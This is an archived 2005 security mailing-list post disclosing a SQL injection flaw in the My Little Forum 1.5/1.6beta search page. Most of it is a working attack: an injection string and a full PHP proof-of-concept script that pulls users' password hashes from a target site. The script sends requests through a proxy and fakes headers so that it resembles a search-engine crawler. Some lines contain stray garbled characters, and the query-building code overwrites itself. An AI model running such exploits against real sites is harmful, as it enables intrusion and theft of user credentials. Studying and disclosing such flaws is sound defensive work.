Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

My Little Forum 1.5 / 1.6beta SQL Injection

from [retrogod] Network Security [Permanent Link]
Subject: My Little Forum 1.5 / 1.6beta SQL Injection
Date: Thu, 22 Sep 2005 16:19:19 -0400 
My Little Forum 1.5 / 1.6beta SQL Injection

software:
site: http://www.mylittlehomepage.net/my_little_forum
software: "A simple web-forum that supports classical thread view (message tree)
as well as messagebord view to display the messages.
Requires PHP > 4.1 and a MySQL database."


1) look at the vulnerable code at line 144 inside search.php:
...
 $result = mysql_query("SELECT id, pid, tid, DATE_FORMAT(time + INTERVAL ".
 $time_difference." HOUR,'".$lang['time_format']."') AS Uhrzeit,
 DATE_FORMAT(time + INTERVAL ".$time_difference." HOUR, 
'".$lang['time_format']."')
 AS Datum, subject, name, email, hp, place, text, category FROM ".$forum_table."
 WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", "
 .$settings['search_results_per_page'], $connid);
...

now goto the search page, select "phrase", and type:

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*

if magic quotes are off you will have (guess?...) any admin/user password hash
'cause $searchstring var is not filtered...

this my poc exploit:

<?php
#   mlfexpl.php                                                                #
#                                                                              #
#   My Little Forum 1.5 ( possibly prior versions) SQL Injection /             #
#   MD5 password hash disclosure poc exploit with proxy support                #
#                                                                              #
#                                by rgod                                       #
#                      site: http://rgod.altervista.org                        #
#                                                                              #
#   make these changes in php.ini if you have troubles                         #
#   to launch this script:                                                     #
#   allow_call_time_pass_reference = on                                        #
#   register_globals = on                                                      #
#                                                                              #
#   usage: launch this script from Apache, fill requested fields, then...      #
#   dump all password hashes from database right now...                        #
#                                                                              #
#   Sun-Tzu: "You can be sure of succeeding in your attacks if you only attack #
#   places which are undefended. You can ensure the safety of your defense if  #
#   you only hold positions that cannot be attacked."                          #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<head><title>My Little Forum 1.5 SQL Injection </title><meta http-equiv="Co
ntent-Type"  content="text/html; charset=iso-8859-1"><style type="text/css"><!--
body,td,th {   color:  #00FF00;} body {  background-color: #000000;} .Stile5   {
font-family: Verdana, Arial, Helvetica,  sans-serif; font-size: 10px;}  .Stile6{
font-family: Verdana, Arial, Helvetica, sans-serif; font-weight:  bold; font-sty
le: italic; } --> </style></head> <body> <p class="Stile6">  My   Little Forum 1
.5 SQL Injection </p><p class="Stile6">a script by rgod at <a href="http: //rgod
.altervista.org"    target="_blank" > http://rgod.altervista.org </a> </p><table
width="84%"><tr><td width="43%">  <form  name="form1"  method="post"   action="'
.$SERVER[PHP_SELF].'?path=value&host=value&port=value&proxy=value&username=value
"><p><input type="text" name="host"><span class="Stile5">hostname (ex: www.siten
ame.com) </span></p><p><input type="text"    name="path">  <span class="Stile5">
path (ex: /mylf/ or just /) </span></p><p><input type="text"  name="port" ><span
class="Stile5"> specify a port other than 80 (default value)</span></p><p><input
type="text" name="proxy"> <span class="Stile5"> send  exploit  through  an  HTTP
proxy (ip:port) </span> </p> <p> <input type="text" name="username"> <span class
="Stile5">username whom you want MD5 hash </span> </p> <p> <input  type="submit"
name="Submit" value="go!"></p></form></td></tr></table></body>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>&nbsp;&nbsp;</td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
àà    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>&nbsp&nbsp</td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
àà    }
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket($packet,$show)
{
global $proxy, $host, $port, $html;
if ($proxy=='')
           {$ock=fsockopen(gethostbyname($host),$port);}
             else
           {
    if (!eregi($proxy_regex,$proxy))
    {echo htmlentities($proxy).' -> not a valid proxy...';
     die;
    }
   $parts=explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) { echo 'No response from proxy...';
ààdie;
àà       }
   }
fputs($ock,$packet);
if ($proxy=='')
  {

    $html='';
    while (!feof($ock))
      {
        $html.=fgets($ock);
      }
  }
else
  {
    $html='';
    while ((!feof($ock)) or 
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
    {
      $html.=fread($ock,1);
    }
  }
fclose($ock);
if ($show) {echo nl2br(htmlentities($html));}
}

if (($path<>'') and ($host<>'') and ($username<>''))
{
  if ($port=='') {$port=80;}


$sql="%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw, 
user_pw, user_pw, user_pw, user_pw, user_pw";
$sql=", user_pw"; //if version is 1.6 beta, just add a comment to ths line
$sql=" FROM forum_userdata WHERE user_name='".$username."'/*";
$sql=urlencode($sql);

if ($proxy=='')
{$packet="GET ".$path."search.php?search=".$sql."&ao=phrase HTTP/1.1\r\n";}
else
{$packet="GET http://".$host.$path."search.php?search=".$sql."&ao=phrase 
HTTP/1.1\r\n";}
$packet.="Client-IP: 127.0.0.1\r\n";
$packet.="X-Forwarded-For: 127.0.0.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, 
application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.$path."search.php\r\n";;
$packet.="Accept-Language: en\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: 
Baiduspider+(+http://www.baidu.com/search/spider.htm)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Keep-Alive\r\n\r\n";
show($packet);
sendpacket($packet,0);
$temp=explode(';<span class="category">(',$html);
$temp2=explode(')</span>',$temp[1]);
$hash=$temp2[0];

echo '<br>username: '.$username.' hash: '.$hash;
# debugging...
//echo htmlentities($html);
}
else
{
echo '<br>fill in all requested fields, optionally specify a proxy...<br>';
}
?>




2) 1.6beta is vulnerable even, we have:
...
$result = mysql_query("SELECT id, pid, tid, UNIX_TIMESTAMP(time + INTERVAL 
".$time_difference." HOUR) AS
Uhrzeit, subject, name, email, hp, place, text, category FROM 
".$db_settings['forum_table']."
WHERE ".$search_string." ORDER BY tid DESC, time ASC LIMIT ".$ul.", 
".$settings['search_results_per_page'],
$connid);
...

you have same results, deleting a statement in injection string:

[whatever]%' UNION SELECT user_pw, user_pw, user_pw, user_pw, user_pw, user_pw,
user_pw, user_pw, user_pw, user_pw, user_pw FROM forum_userdata where
user_name='[username]' /*


rgod

site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/mylittle15_16b.html

Attachment: GWAVADAT.TXT
Description: Text document

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  [Full-disclosure] [ GLSA 200509-17 ] Webmin, Usermin: Remote code execution through PAM authentication, Thierry Carrez
Next by Date:  "Exploiting the XmlHttpRequest object in IE" - paper by Amit Klein, Amit Klein (AKsecurity)
Previous by Thread:  My Little Forum 1.5 / 1.6beta SQL Injection, retrogod
Next by Thread:  Hack Dot AE v2, SpyHat
Indexes:  [Date] [Thread] [Top] [All Lists]